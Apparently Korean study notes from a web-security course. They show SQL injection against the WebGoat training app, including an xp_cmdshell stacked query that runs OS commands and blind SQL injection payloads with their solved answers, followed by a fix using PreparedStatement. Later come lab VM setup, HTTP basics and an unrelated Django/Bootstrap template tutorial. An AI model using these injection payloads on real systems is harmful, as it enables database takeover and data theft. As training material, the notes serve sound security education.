• 데이터베이스에서 제공하는 Stored Procedure를 실행하는 구문을 입력
• 데이터베이스의 제어권 탈취 가능

(1) 예시

select * from members id = 123 ; exec xp_cmdshell 'cmd.exe /c dir'

• ;는 쿼리문의 종결을 의미
• exec는 Stored Procedure를 실행
  • 일반적으로 시스템 Stored Procedure를 우선적으로 활용
• xp_cmdshell은 MS-SQL에서 제공하는 시스템 Stored Procedure로 매개변수로 전달된 값을 DBMS의 쉘에서 실행하고 그 결과를 반환
• DBMS의 쉘에서 실행할 명령어

5) Blind SQL Injection

• 쿼리 실행 결과에 따라서 서버의 반응이 달라지는 경우
• 공격자가 원하는 내용을 조회하는 쿼리를 작성해서 전달하고 실행 결과를 보면서 정보를 수집

(1) 예시

[정상적인 실행]
select * from members where id = 123           ⇒ 존재하는 ID인 경우 → ID가 123인 사용자의 정보를 제공
select * from members where id = 999           ⇒ 존재하지 않는 ID인 경우 → 존재하지 않습니다. 메시지를 제공

[공격 가능 여부를 확인]
select * from members where id = 123 and 1 = 1         ⇒ ID가 123인 사용자의 정보를 제공
select * from members where id = 123 and 1 = 2         ⇒ 존재하지 않습니다. 메시지를 제공

[공격자가 알고자 하는 정보를 조회하는 쿼리를 전달]
select * from members where id = 123 and 공격자가 알고자 하는 정보를 조회하는 쿼리

• 공격 가능 여부를 확인할 때 조건에 따라 결과 화면이 달라짐
• 사용자 정보가 출력됨, 해당 쿼리가 참이고, 오류 메시지가 출력되면 해당 쿼리가 거짓인 것을 알 수 있음

8. Blind Numeric SQL Injection 실습

Injection Flaws > Blind Numeric SQL Injection

• 사용자가 입력한 계좌 번호의 유효성(있다, 없다)을 확인해 주는 웹 페이지
• 해당 계좌가 존재하는 경우, Account number is valid. 를 출력
• 목표는 pins 테이블에서 cc_number 컬럼의 값이 1111222233334444와 일치하는 pin 컬럼의 값을 찾는 것

1) 정상적인 동작

• 해당 계좌가 존재하는 경우, Account number is valid. 를 출력
• 해당 계좌가 존재하지 않는 경우, Invalid account number. 를 출력

2) 개발자 도구 이용해서 소스 코드 분석

<input name="account\_number" type="TEXT" value="999">

3) 서버로 전달되는 값(GET 방식으로) 유추

attack?Screen=35&menu=1100&account_number=999&SUBMIT=Go!

4) 서버에서 요청으로 전달된 값을 쿼리를 생성하고 실행하는 데 사용(힌트를 이용 추측)

-   select * from accounts where account_number = 999

5) 공격자가 알고자 하는 정보를 조회 하는 쿼리 (문제 힌트 이용)

select pin from pins where cc_number = '1111222233334444'

6) 원래 서비스 쿼리에 추가

101 and (select pin from pins where cc_number='1111222233334444') > 2000

• 참과 거짓을 판단할 수 있도록 >을 넣어준다

102 and (select pin from pins where cc_number='1111222233334444') > 1000

• 조건을 만족하는 pin 값은 1000보다 크다

102 and (select pin from pins where cc_number='1111222233334444') > 5000

• 조건을 만족하는 pin 값은 1000보다 크고 5000보다 작음

102 and (select pin from pins where cc_number='1111222233334444') = ????

• 범위를 점점 줄여서 최종적으로 아래 쿼리를 만족하는 숫자를 찾음

102 and (select pin from pins where cc_number='1111222233334444') = 2364

• Account number is valid가 출력

7) Burp Suite 사용

• 위에서 실습한 결과를 가지고 사용 방법을 익힌다.
• Brute Force(브루트 포스)를 사용할 수 있다.
• 여기서는 범위를 알기 때문에 Numbers를 사용해 사용법을 익힌다.

(1) intercept on

(2) Go! 눌러서 intercept

(3) account_number 매개변수에 오른쪽 클릭

• send to intruder 클릭

• intruder에 색이 변함

(4) intruder 확인

• account_number에 문자가 들어가 있는데 여기에 공격한다는 의미

(5) Payloads 설정

• Numbers 타입 설정
• 2350부터 2380까지 1씩 증가 하는 숫자 범위 설정 후 Start attack

(6) attack 확인

• account_number에 2364가 들어갔을 때만 Length가 다름

위, 아래 값들은 Invalid account number.의 값이 들어가는 것이고, 2364는 다른 값이 들어가는 것을 확인할 수 있다.

(7) WebGoat 입력

9. Blind String SQL Injection

Injection Flaws > Blind String SQL Injection

• 목표는 pins 테이블에서 cc_number 컬럼의 값이 4321432143214321과 일치하는 name 컬럼의 값을 찾은 것
• name 컬럼은 문자열 타입의 데이터를 저장하는 컬럼
• 힌트 field name, table pins, row cc_number

1) 쿼리문 유추

이전 문제와 비슷한 문제로 일치하는 결과가 있는 경우와 일치하는 결과가 없는 경우로 나누어야 한다.

이전 문제는 숫자로 나누는 것이지만, 이번 문제는 문자로 나누는 것이다. 

SELECT * FROM accounts WHEREaccount_number = 102 and (SELECT name FROM pins WHERE cc_number = '4321432143214321') = ???

이렇게 했을 때, ?에 맞는 문자열이 온다면 102도 있는 값이고 and 뒤 쿼리문도 맞는 값이 되어 Account number is valid.가 나올 것이다. 여기서도 Burte Force로 공격한다면 엄청난 경우의 수가 나오기 때문에 그렇게 할 수는 없을 것이다.

2) 한 글자씩 추출

• substr()
• substr은 문자열 자르기로 substr(문자열, 시작 위치, 길이)로 사용하는 함수
• 문자열 : 원하는 문자열(대상 컬럼)
• 길이 : 시작 위치부터 마지막 위치

select * from accounts where account_number = 102 and (select substr(name, 1, 1) from pins where cc_number = '4321432143214321') = '?'

select * from accounts where account_number = 102 and (select substr(name, 2, 1) from pins where cc_number = '4321432143214321') = '?'

해당 컬럼에 문자를 하나씩 가져와서 ?에 있는 것과 맞는지 확인하는 것이다. 하지만 딱 맞는 알파벳을 찾기란 쉽지 않다.

3) 이름 데이터의 각 자리를 아스키코드로 만들어서 범위 연산 수행

문제 힌트에도 나왔듯이 문자를 숫자로 바꾸는 생각을 해야 한다. 문자를 숫자로 바꾸는 것은 ASCII 코드를 사용해 이전 문제와 같이 범위 연산을 하면 맞는 알파벳을 찾아가기에 효율성을 높일 수 있다.

select * from accounts where account_number = 102 and (select ascii(substr(name, 1, 1)) from pins where cc_number = '4321432143214321') < 46

4) 찾는 값

위 범위 연산을 해서 최종으로 찾는 값은 Jill이 된다.

select * from accounts where account_number = 102 and (select name from pins where cc_number = '4321432143214321') = 'Jill'

이 코드를 입력하면 Account number is valid가 나오는 것을 볼 수 있다. 

10. 취약한 소스코드 확인

Ctrl + Shift + R (Open Resource, 열려 있는 프로젝트에서 특정 패턴의 파일을 검색해서 열어주는 도구)

이클립스에서 파일을 찾는다.

Ctrl + Shift + F를 눌러 자동으로 코드 내용을 문법 템플릿에 맞게 포맷팅(들여쓰기) 한다.

69번 줄 protected Element createContent(WebSession s) 함수 안에 있는 문구 중 77번 줄, 84번 줄, 106~108줄을 본다.

1) 77번 줄

String accountNumber = s.getParser().getRawParameter(ACCT\_NUM, "101");

• 요청 파라미터 중 ACCT_NUM 파라미터의 값을 가져와서 반환
• 만약 파라미터 또는 파라미터의 값이 없는 경우 101을 반한

2) 문제점 

외부 입력값에 쿼리 조작 문자열 포함 여부를 확인하지 않고 문자열 결합 방식의 쿼리문 생성하고 있음

외부 입력값에 의해 쿼리의 구조와 의미가 변형될 수 있음

(1) 84번 줄

String query = "SELECT \* FROM user\_data WHERE userid = " + accountNumber;

• 문자열 결합 방식으로 쿼리를 생성

(2) 106번 줄

Statement statement = connection.createStatement(

ResultSet.TYPE\_SCROLL\_INSENSITIVE, ResultSet.CONCUR\_READ\_ONLY); ResultSet results = statement.executeQuery(query);

Statement 구문을 통해서 만들어진 쿼리를 그대로 실행

위 80번, 87번에서 쿼리 조작 문자열 포함 여부를 검증하지 않고 문자열 결합 방식으로 쿼리를 생성하면서 문제가 있었는데, 쿼리를 실행하는 부분에서도 만들어진 쿼리를 그대로 실행해서 문제가 발생한다.

4) Java Statement 객체

(1) Statement 

• 만들어진 문자열 형태의 쿼리를 그대로 전달해서 실행
• 쿼리 생성 책임이 개발자에게 있음

(2) PreparedStatement

• 미리 정의한 쿼리 구조에 맞춰서 쿼리를 생성해서 DB로 전달해서 실행
• 쿼리 구조 정의는 개발자가 하고, 쿼리 생성은 해당 객체가 책임지고 수행

(3) CallableStatement

• DB에 정의되어 있는 Stored Procedure를 호출할 때 사용

5) 취약한 소스 코드 안전하게 변경

(1) 84번 줄

String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;

• PreparedStatement 객체를 이용해서 미리 정의한 구조로 쿼리가 실행되는 것을 보장
  • 구조화된 쿼리 실행 또는 파라미터화된 쿼리 실행

String query = "SELECT * FROM user_data WHERE userid = ? ";

• 쿼리의 구조를 정의
  • 변수 부분을 ?로 표시 (데이터 타입을 고려하지 않음 = 따옴표를 포함하지 않음)

userid 문자열이면 따옴표가 있어야 하지만 PreparedStatement에서 쿼리를 정의할 때는 숫자인지, 문자열인지 구분하지 않아서 변수가 들어가는 부분에 물음표를 쓴다.

(2) 106번 줄

Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);

• PreparedStatement 객체 생성
  • connection.prepareStatement() 메서드를 이용해서 생성
  • 매매 변수의 값으로 쿼리 구조 전달

> PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);

• 객체 생성 시 쿼리 구조를 미리 정의
• Ctrl + Shift + O 눌러서 PreparedStatement import 

ResultSet results = statement.executeQuery(query);

• 쿼리 실행에 필요한 변수를 성정하고 쿼리를 실행
  • 변숫값이 할당되는 컬럼의 데이터 타입에 맞는 메서드를 사용해야 함
  • 쿼리 실행 메서드에 쿼리문을 전달하지 않아야 함

statement.setInt(1, Integer.parseInt(accountNumber));  
ResultSet results = statement.executeQuery();

• 데이터 타입에 맞춰서 해당하는 메서드를 선택(int)
• 변수의 값을 할당(PreparedStatement는 인덱스가 1부터 시작)
  • 공격 문자가 포함되면 숫자 변환 시 오류가 발생
• 쿼리 구문이 PreparedStatement에 이미 정의되어 있으므로 executeQuery() 메서드에 쿼리문을 전달하지 않음

C:\FullstackLAB\run.bat 실행

작업 관리자에 MySQL 서비스가 실행되고 있으면 실행할 때 오류가 발생할 수 있다.

작업 관리자를 실행해 MySQL을 종료하고 실행해야 한다.

1) Tomcat 서버 실행

이클립스에서 서버를 실행

1. JavaEE 퍼스펙티브로 전환(옵션)
2. 퍼스펙티브를 초기화 (옵션)
3. Server 탭을 클릭, 등록된 서버 확인
4. Tomcat을 선택, 실행할 서버를 선택
5. 디버거 모드 또는 실행 모드로 서버 실행

실행 시 화면 비율이 사진과 같지 않다면 1번부터 진행하고, 사진과 같은 비율이라면 3번부터 하면 된다.

2) 서버 실행 확인

3) index.html 추가

index.html이 없으면 로그인 후 404 오류 발생

이클립스 WebGoat\src\main\webapp\ 에서 오른쪽 클릭 후 New HTML File을 선택해서 index.html 추가

<!DOCTYPE html>
<html>
<head>
<meta charset="EUC-KR">
<title>Insert title here</title>
<meta http-equiv="refresh" content="0; url=attack"></meta>
</head>
<body>
</body>
</html>

2. Kali 가상머신 프록시 설정

 Proxy는 중간, 대리, 중계

프록시는 클라이언트와 웹서버가 요청과 응답을 할 때 중간에서 중계해 주는 것이다.

• 요청과 응답 내용을 모니터링 가능
• 모니터링한 내용 기록(히스토리), 재생, 분석
• 요청 데이터가 통과할 때 모니터링 하기 위해 일시적으로 멈추게 하는 기능을 Intercept라고 한다.

1) Burp Suite

(1) Proxy listener 설정

Proxy > Proxy settings > Proxy listener 체크 확인

2) Firefox 브라우저 프록시 사용 설정

3. BurpSuite Intercept 사용

BurpSuite에서 Intercept on 설정 상태에서 Firefox를 이용해 WebGoat 사이트로 요청

1) Iintercept on

2) WebGoat 요청

• 요청을 인터셉터 해서 어떻게 처리할 건지 물어봄

일반적으로 /WebGoat이라고 하면 WebGoat는 파일을 나타낸다.

• Forward 클릭

/WebGoat/ 은 WebGoat이라는 디렉터리를 요청

• Forward 클릭

/WebGoat/attack 반환한다. WebGoat 디렉터리에 attack 파일을 요청

4. HTTP History 탭을 통해 요청 / 응답 과정을 확인

http://host.py:8080/WebGoat으로 요청했을 때 리다이렉터 응답(http://host.pc:8080/WebGoat/로 재요청)받음

1. http://host.pc:8080/WebGoat/으로 요청
2. 디렉터리 리스팅 옵션 확인 후 기본 페이지 검색
3. 기본 페이지(index.html)를 응답으로 반환
4. index.html 파일 내용에 attack 페이지로 재요청이 포함되어 있음

1) index.html 확인

2) attack 파일의 내용을 응답으로 반환

주소를 한 번만 입력했는데 눈에 보이지 않게 여러 번 리다이렉션을 내부적으로 하고 있다. 눈으로 보면 볼 수 없지만 Proxy 도구를 이용해서 따라가면 볼 수 있다. 웹 애플리케이션은 엄청나게 많은 리다이렉션을 하는데 그것을 트레이싱 하기 위해서는 이러한 도구를 사용해야 한다.

사용하는 방법을 익히고 익숙해져야 한다.

웹 애플리케이션에서는 클라이언트, Web 서버, WAS 서버, DB 서버가 있다.

클라이언트가 웹에 요청할 때 static한 데이터는 웹에서 실행하고, dynamic한 데이터는 WAS 서버 관련된 데이터를 DB 서버에서 조회해서 그에 맞는 응답을 전달한다.  

이때, 클라이언트에서 오는 데이터가 안전한지 아닌지를 판단해야 하고, 그 판단이 안전하지 않다고 판단되는 것들은 더 이상 내부로 진입할 수 없도록 하는 기법들이 나온다. 

기법 중 가장 앞에 나오는 것은 방화벽인데 방화벽은 특정 IP나 특정 Port로의 진입과 진출을 제어하는 데 사용한다.

Web 서버에 접근할 때 80 포트를 사용할 때, 80 포트로만 접근해야 하는데, 80 포트가 아닌 허용하지 않는 포트로 접근한다는 것은 정상적이지 않은 작업을 한다는 것이라고 할 수 있다. IP 주소와 포트 번호가 들어오고 나가는 것을 제어하는 것을 방화벽이 한다.

방화벽만으로 모든 것을 막을 수 있을까?

만약 동적인 데이터가 들어와서 DB 서버에 쿼리를 전달해 데이터를 받아와야 할 때 방화벽은 동적인 데이터나 쿼리문에 대해 제어하지 않고 서버 주소가 맞고 서비스 포트가 맞으면 통과한다.

동적인 매개변수에 올 수 없는 값들이 포함되는 것을 방화벽은 모른다. 이를 확인할 수 있는 것이 WAF(웹 애플리케이션 방화벽)라고 한다.

WAF는 웹으로 넘어오는 매개변수들의 패턴을 추출해서 검증해 서버로 들어가지 못하도록 막아주는 역할을 한다.

기존 방화벽의 한계를 보완해 준다.

방화벽과 WAF는 네트워크 단에서 H/W 기반으로 방어하는 것이다. 

이 두 가지를 사용해서 100% 막을 수 있을까? 100%로 막기는 어렵다. 

방호벽, IDS/IPS, 웹 방화벽에서의 침해사고 발생빈도는 크게 높지 않다. 최근 침해사고는 서버 구간에서 제일 많이 나온다. 잘못 만들어진 애플리케이션의 취약점으로 인해 보안 사고가 발생하는데 최근 조사에 따르면 이곳에서 보안사고 92%가 생긴다고 한다.

이러한 보안 사고를 막기 위해서는 시큐어 코딩해야 한다. 가이드라인을 확인하고 그것에 맞게 시큐어 코딩해야 한다.

사전점검을 통해 SW 개발 보안이 이루어지면 취약점 조치 비용이 절약된다. 설계단계 대비 최대 30배의 취약점 수정 비용 절약할 수 있다.

1) 가이드라인

가이드라인 페이지

가이드라인은 종류별로 있으니 필요한 것을 찾아 확인 후 가이드라인에 맞게 개발해야 보안 사고가 줄어든다.

2) 안전한 SW 개발

소스코드 등에 존재할 수 있는 잠재적인 보안 약점을 제거하고, 보안을 고려하여 기능을 설계 구현하는 등
SW 개발 과정에서 실행되는 일련의 보안 활동을 수행해야 한다.

시큐어 코딩과 SW 개발 보안 활동을 해야 한다.

• 애플리케이션의 문제점 도출
  • 정적 분석과 동적 분석은 상호 보완적 관계로 항상 함께 적용해야 함
• 정적 분석
  • 애플리케이션을 실행하지 않고 소스 코드의 내용, 형태, 구문 등을 분석해서 문제가 있는지 확인
  • 코드 리뷰
• 동적 분석
  • 애플리케이션을 실행해서 원하는(계획한) 결과가 제공되는지를 확인
  • 디버깅, 부하 테스트, 모의해킹, 침투 테스트
  • 인증 및 인가와 같이 정적 분석으로 파악이 힘든 경우 수행

3) 소프트웨어 보안 약점

2. HTTP

1) 특징

• HTTP는 단순
• HTTP는 확장 가능
• HTTP 이전 요청과 현재 요청 사이의 관계를 유지하지 않지만, 세션을 사용하여 클라이언트 상태를 유지
  • 성공적으로 완료된 두 개의 요청 사이에는 연결고리가 없음
  • 헤더 확장성을 사용하여, 동일한 컨텍스트, 동일한 상태를 공유하기 위해 각각의 요청들에 세션을 만들도록 쿠키를 추가
• HTTP 연결
  • HTTP/1.0 : 요청/응답 교환에 대한 각각의 TCP 연결을 생성, 비연결성만 지원
  • HTTP/1.1 : 파이프라이닝 개념과 지속적인 연결의 개념 도입, 멀티플렉싱 등 지원
  • HTTP/1.2 : 단일 연결을 통해 메시지 다중화, 더욱 효율적인 연결 관리, 헤더 압축 등 지원 

2) 흐름

연결, 요청, 응답, 연결 해제

3) 요청

• 웹 브라우저가 웹 서버에게 자원을 요청
• 시작줄, 요청 헤더, 요청 본문으로 구성
• 시작줄은 "요청 방식(method) + URI(URL) + 프로토콜 버전"으로 구성
• 요청 헤더와 요청 본문 사이에는 1개의 빈 공백 라인이 존재
  • 이것을 통한 공격기법이 있기 때문에 중요한 특징이다.

4) 응답

• 웹 브라우저의 요청에 대한 처리 결과 전달
• 시작줄, 응답 헤더, 응답 본문으로 구성
• 시작줄은 "프로토콜 버전 + 상태 코드 + 상태 메시지"로 구성
• 응답 헤더, 응답 본문을 구분하는 기준은 1개의 공백 라인
• 응답 헤더는 브라우저에 서버가 전달해 주는 부가적인 정보
• 응답 본문은 내가 요청한 실질적인 데이터

5) 요청 메서드

(1) GET

• 웹 서버로 자원을 요청할 때 사용(default)
• 요청 파라미터를 URL에 포함해서 전달하는 방식
• 전송할 수 있는 데이터의 크기가 제한(지금은 거의 무한대)
• 북마크가 필요한 경우에 사용

(2) POST 메서드

• 웹 서버로 자원을 요청할 때 사용
• 요청 파라미터를 요청 본문에 포함해서 전달하는 방식
• 전송할 수 있는 데이터의 크기 제한이 없음(시간제한 개념)

• VMware workstation
• WebGoat
• bWAPP
• Kali Linux

다운로드 후 설치와 압축 해제한다. 단, WebGoat 파일인 FullstackLAB_20240312은 C:\ 경로에 압축 해제해야 한다.

2. VMware workstation

위 링크는 VMware workstation Pro의 링크다. workstation Pro는 무료 30일 라이선스만 지원하고 시리얼 키를 구매해야 정상적인 사용이 가능하다. 무료 30일 라이선스가 만료되어도 가상머신의 전원만 못 켤 뿐 생성 및 기타 작업이 가능하다.

(구글, Github 등 인터넷에 시리얼 키가 돌아다닌다고는 하는데.... ) 추천하진 않는다. 각자의 판단하에 선택하기를 바란다.                          

Pro의 가장 유용한 기능은 스냅샷 기능이다. Pro의 무료 30일 라이선스가 지나면 대부분 스냅샷 기능을 사용하기 위해 설치한다고 할 수 있다. 

그래서 Pro는 스냅샷 기능만 사용하고 Workstation Player에서 실습하는 것을 추천한다.

Player는 비상업용으로는 무료이기 때문에 큰 제약은 없지만 Pro에 있는 기능을 전부 사용할 수는 없다.

Player는 Pro를 설치하면 같이 설치되는데 Pro를 설치한 위치로 들어가면 Player 프로그램을 찾을 수 있다.

1) Player

압축 해제한 kali와 Bee-box를 open 메뉴를 이용해 추가 해준다.

Bee-box는 설정이 필요하다. Bee-box를 선택 후 settings에 들어간다.

Bee-box의 세팅을 열고 Network Adapter에 보면 Bridged로 되어 있는데 NAT로 변경해야 실습이 가능하다.

같은 네트워크 안에서 서로 주고받아야 하는데 Bridged로 하면 같은 네트워크 IP로 할당되지 않게 된다.

2) VMware workstation Pro

pro는 Snap shot을 하기 위한 것이다. 스냅샷은 지금 당장 하지 않고 가상환경의 설정이 끝나면 사용할 것이기 때문에 밑에 가상환경 설정 후 다시 설명한다.

3. Bee-box

키보드 설정

4. Kali

칼리의 로그인 ID와 비밀번호는 Kali다.

킬리의 설정은 크게 할 필요는 없는데 실습하다 보면 절전모드로 들어가 화면이 꺼진다. 화면이 꺼지면 ID와 비밀번호를 다시 입력해서 들어가야 하는 불편함이 생긴다. 그래서 절전모드 설정을 끄거나 로그인 화면을 없애면 되는데 간단하게 절전모드 끄는 것을 선택했다.

Kali에서 시작메뉴를 누르고 Settings에서 Power Manager로 들어간다.

Power Manager에서 Display로 들어오면 나오는 화면인데 비활성화하고, blank after 설정이 Never가 나올 수 있도록 왼쪽 끝으로 설정하면 된다. Plugged in에서도 같은 설정을 하면 된다.

이 pc는 노트북이어서 두 가지 설정이 나왔지만, 데스크탑이라면 On battery와 Plugged in 탭이 없기 때문에 한 번만 설정하면 된다.

5. 각 가상머신의 IP 확인 후 hosts 파일에 등록

1) IP 확인

(1) Kali

• ifconfig

(2) Bee-box

• ifconfig

(3) Host PC

• ipconfig

2) Host PC의 hosts 파일에 각 가상환경의 IP 등록

Host PC에서 cmd를 관리자 권한으로 실행 후 notepad c:\Windows\System32\drivers\etc\hosts 입력

각자의 IP를 hosts 파일에 등록한다.

hosts에 IP를 등록하면 각 환경에서 등록한 이름으로 접근을 할 수 있다.

3) Bee-box의 hosts 파일에 IP 등록

Bee-box cmd에서 sudo gedit /etc/hosts를 입력하면 비밀번호를 입력해야 하는데 bug를 입력하면 된다.

4) Kali의 hosts 파일에 IP 등록

칼리에는 gedit이 없어 설치해야 한다. 

• sudo apt update
• sudo apt install gedit -y

위 두 명령어를 입력해 gedit을 설치한다.

• sudo gedit /etc/hosts

같은 방법으로 hosts에 IP를 등록한다.

6. 초기 설정 Snap shot

기본 설정들이 끝났고, 위 2) VMware workstation Pro에서 말했던 스냅샷을 한다.

스냅샷는 가상환경의 문제가 있거나 설정이 바뀌면 지금 초기 설정이 완료된 시점으로 돌아올 수 있게 위치를 저장하는 것이다.

설정이 완료된 가상환경을 종료하거나 suspend로 정지시킨 후 Pro에서 두 가상 머신을 열어준다.

Kali도 같은 방법으로 스냅샷을 설정한다.

웹 페이지를 만들 때 세 가지 요소가 있다.

HTML은 데이터를 나타내는 데 구조적으로 표현하기 위한 것이다. 데이터는 태그를 둘러싸여 있는데 기계가 해석하기에는 편한데 사람이 보기에는 어렵다. 그래서 이것을 구조와 형식을 만들어주는 CSS로 스타일을 만드는 것이다.

CSS는 해당하는 문서의 구조, 형식, 색깔, 배치, 모양을 다루는 것이다. 데이터들을 시각화해서 사람이 쉽게 해석할 수 있도록 하는 것이 CSS에서 스타일을 만드는 것이다. 기계는 태그를 통해 해석하는 반면에, 사람은 시각적인 데이터를 가지고 해석한다. 그래서 CSS는 사람을 위한 것이다.

Java Script는 동작을 처리하기 위해 사용한다. 모든 것들을 서버 사이드에서 다 만들어서 전달 해도 되지만 그렇게 하면 너무 많은 것들을 서버에서 만들어야 하므로 일정 수준을 브라우저에 위임시키는 것이다.

여기서는 스타일 적용을 위해 CSS를 살펴본다.

1) style.css 적용

C:\python\project\mysite\satic\style.css

textarea{
    width: 100%;
}
input[type=submit] {
    margin-top: 10px;
}

{ }(중괄호) 앞에 나오는 것을 선택자라고 한다. CSS 형태는 "선택자 {적용할 스타일; 적용할 스타일; ...}"으로 되어 있다.

CSS와 선택자에 대한 내용은 이곳에 자세히 설명되어 있으니 꼭 읽어보는 것을 추천한다.

textarea는 요소(태그) 선택자인데, textarea 태그에 적용할 스타일을 지정하는 것이다.

input은 속성 선택자이다. input 태그 중 type 값이 submit인 태그에 적용할 스타일을 지정하는 것이다.

2) config\settings.py에 스태틱 디렉터리 등록

스태틱 파일이 위치하는 곳을 설정 파일에 등록

STATIC_URL = '/static/'

STATICFILES_DIRS = [
    BASE_DIR / 'static', 
]

3) 질문 상세 페이지(question_detail.html)에 스타일 적용

{% load static %}            <!-- 추가 -->
<link rel="stylesheet" type="text/css" href="{%static 'style.css'}">

<h1>{{ question.subject }}</h1>

<div>
    {{ question.content }}
</div>

<!-- 답변 내용 출력 -->
<h5>{{ question.answer_set.count }}개의 답변이 있습니다.</h5>
<div>
    <ul>
        {% for answer in question.answer_set.all %}
            <li>{{ answer.content }}</li>
        {% endfor %}
    </ul>
</div>

<form action="{% url 'pybo:answer_create' question.id %}" method="post">
    {% csrf_token %}
    <textarea name="content" id="content" rows="15"></textarea>
    <input type="submit" value="답변 등록"/>
</form>

스태틱 디렉터리에 있는 style.css를 사용하겠다는 것을 정의한 것이다.

4) 브라우저 확인

답변 내용을 입력하는 창(textarea 태그)의 넓이가 화면의 가로 100%를 차지하고 답변 등록 버튼(submit 버튼)의 위쪽 바깥 여백이 10px 추가된 것을 확인할 수 있다.

2. 부트스트랩

부트스트랩 다운로드

위와 같이 태그를 하나하나 입력할 수도 있지만, 페이지가 커지면 태그 하나하나 스타일을 정하기는 쉽지 않다. 그래서 잘 정리되어 있는 스타일 파일을 가져와 사용하는 것이 효율적이다.

미리 정리되어 있는 속성들을 이용해서 세팅만 하면 원하는 형태의 화면이 쉽게 만들어질 수 있다.

다운받은 압축파일에서 bootstrap.min.css 파일을 static 디렉터리에 복사한다.

1) 질문 목록 템플릿(question_list.html)에 부트스트랩 스타일 적용

{% load static %}
<link rel="stylesheet" type="text/css" href="{% static 'bootstrap.min.css' %}" >

<div class="container my-3">
    <table class="table">
        <thead>
            <tr class="thead-dark">
                <th>번호</th>
                <th>제목</th>
                <th>작성일시</th>
            </tr>
        </thead>
        <tbody>
            {% if question_list %}
                {% for question in question_list %}
                    <tr>
                        <td>{{ forloop.counter }}</td>
                        <td>
                            <a href="{% url 'pybo:detail' question.id %}">
                            {{ question.subject }}
                            </a>
                        </td>
                        <td>{{ question.create_date }}</td>
                    </tr>
                {% endfor %}
            {% else %}
                <tr>
                    <td colspan="3">질문이 없습니다.</td>
                </tr>
            {% endif %}
        </tbody>
    </table>
</div>

class들을 일정한 규칙으로 미리 정의 되어 있는 것을 적용하면 그 클래스에 맞는 스타일이 자동으로 입혀지도록 만들어져 있다.

container는 화면 전체를 감싼다는 의미다. m은 margin(마진)이다. margin은 콘텐츠와 박스 요소 테두리 선 바깥쪽의 간격을 뜻한다. 이때 박스 요소의 바깥쪽 테두리에는 Top, Bottom, left, right가 있는데, m만 사용하면 네 방향, mx는 왼쪽, 오른쪽, my는 위, 아래를 말한다. 그래서 my-3을 사용하면 3px만큼 여백을 준다는 의미가 된다.

table은 도표가 나오는 것이다. 도표에는 항상 타이틀이 나오고 내용이 나오는데 이를 지정하는 부분이 thead가 된다.

tr은 테이블의 row 데이터 가로줄을 나타내고, th는 테이블의 column 데이터 세로줄을 나타내고, td는 테이블의 내용(데이터)을 나타낸다. tr은 table row의 약자, th는 table head의 약자, td는 table data의 약자다.

thead-dark는 헤더의 배경색을 어두운색으로 준다는 의미다.

색깔 같은 경우에는 색깔 코드를 직접 입력하지 않고 부트스트랩에서 지정한 단어를 사용하면 그 단어에 지정된 색깔을 넣어준다. 이 색깔의 정의는 부트스트랩에서 볼 수 있다.

tbody는 실제 데이터가 들어가는 것이다. 

(1) 브라우저 확인

2) 질문 상세 페이지(question_detail.html) 부트스트랩 스타일 적용

{% load static %}
<link rel="stylesheet" type="text/css" href="{% static 'bootstrap.min.css' %}">

<div class="container my-3">
    <h2 class="border-bottom py-2">{{ question.subject }}</h2>

    <div class="card my-3">
        <div class="card-body">
            <div class="card-text" style="white-space: pre-line;">
                {{ question.content }}
            </div>
            <div class="d-flex justify-content-end">
                <div class="badge badge-light p-2">
                    {{ question.create_date }}
                </div>
            </div>
        </div>
    </div>

    <h5 class="border-bottom my-3 py-2">
        {{ question.answer_set.count }}개의 답변이 있습니다.
    </h5>
    {% for answer in question.answer_set.all %}
    <div class="card my-3">
        <div class="card-body">
            <div class="card-text" style="white-space: pre-line;">
                {{ answer.content }}
            </div>
            <div class="d-flex justify-content-end">
                <div class="badge badge-light p-2">
                    {{ answer.create_date }}
                </div>
            </div>
        </div>
    </div>
    {% endfor %}

    <form action="{% url 'pybo:answer_create' question.id %}" method="post" class="my-3">
        {% csrf_token %}
        <div class="form-group">
            <textarea name="content" id="content" rows="15" class="form-control"></textarea>
        </div>
        <input type="submit" value="답변 등록" class="btn btn-primary"/>
    </form>
</div>

my는 박스 요소의 바깥 위, 아래 여백이고, py는 박스 요소의 안쪽 여백을 의미한다.

card라는 것은 카드 형식의 출력을 나타낼 때 사용한다. card의 설명은 부트스트랩 Components Card에서 볼 수 있다.

pre-line은 연속된 공백 문자를 하나로 합친다는 의미다.

d-flex justify-content-end는 오른쪽 정렬을 의미한다.

badge는 작성된 날짜가 회색 바탕으로 나오는 것을 볼 수 있다.

form-group은 form element(요소)들을 묶어 주는 역할을 한다. form element는 form 태그 안에 있는 사용자 입력을 받을 수 있는 태그들을 말한다.

(1) 브라우저 확인

3. HTML5 표준에 맞춰서 변경

HTML5에 대한 자세한 설명은 링크로 대체

HTML5 표준은 개발 생산성을 향상, 시맨틱 태그 등장, 멀티미디어 강화 등을 테마로 해서 등장한 표준이다.

HTML5의 input Types의 예제와 실습 링크를 첨부한다. 링크에서 나오는 예제들이 개발 편의성을 향상했다.

1) templates\base.html 생성

모든 화면에 공통으로 적용되는 내용 (문서의 틀), 템플릿 파일을 구조화

{% load static %}
<!doctype html>
<html lang="ko">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shring-to-fit=no">
    <link rel="stylesheet" type="text/css" href="{% static 'bootstrap.min.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'style.css' %}">
    <title>Hello, pybo!</title>
</head>
<body>
    {% block content %}
    {% endblock %}
</body>
</html>

2) question_list.html 질문 목록 템플릿 수정

{% extends 'base.html' %}    <!-- 추가 -->

{% block content %}        <!-- 추가 -->
<div class="container my-3">
    <table class="table">
        <thead>
            <tr class="thead-dark">
                <th>번호</th>
                <th>제목</th>
                <th>작성일시</th>
            </tr>
        </thead>
        <tbody>
            {% if question_list %}
                {% for question in question_list %}
                    <tr>
                        <td>{{ forloop.counter }}</td>
                        <td>
                            <a href="{% url 'pybo:detail' question.id %}">
                            {{ question.subject }}
                            </a>
                        </td>
                        <td>{{ question.create_date }}</td>
                    </tr>
                {% endfor %}
            {% else %}
                <tr>
                    <td colspan="3">질문이 없습니다.</td>
                </tr>
            {% endif %}
        </tbody>
    </table>
</div>
{% endblock %}            <!-- 추가 -->

